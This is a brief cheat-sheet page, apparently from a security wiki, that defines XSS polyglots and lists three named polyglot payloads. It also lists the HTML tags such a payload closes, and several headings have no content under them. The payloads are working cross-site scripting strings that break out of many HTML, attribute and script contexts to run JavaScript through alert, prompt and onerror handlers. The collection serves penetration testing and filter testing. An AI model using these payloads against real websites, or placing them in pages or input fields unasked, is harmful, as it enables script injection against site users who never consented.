👑Polyglot XSS

What is an XSS polyglot?

An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

---------------------------------------------------------------

Polyglot XSS

Polyglot XSS - Muhammad Asad

'"></a></script></title></form></span></meta></style></iframe></noscript></textarea></xmp></pre><ScRiPt>alert(/HAMZA-SAKHI/)</sCrIpT>

Polyglot XSS - 0xsobky

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Polyglot XSS - Ashar Javed

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

Other XSS Polyglots

---------------------------------------------------------------

DOM XSS Polyglots

---------------------------------------------------------------

XSS Polyglot to close all of the HTML tags that need to be closed for XSS:

  • <!--

  • <title>

  • <textarea>

  • <noscript>

  • <xmp>

  • <template>

  • <noembed>

---------------------------------------------------------------

Polyglot XSS - @s0md3varrow-up-right

Polyglot XSS - from Brutelogic

Last updated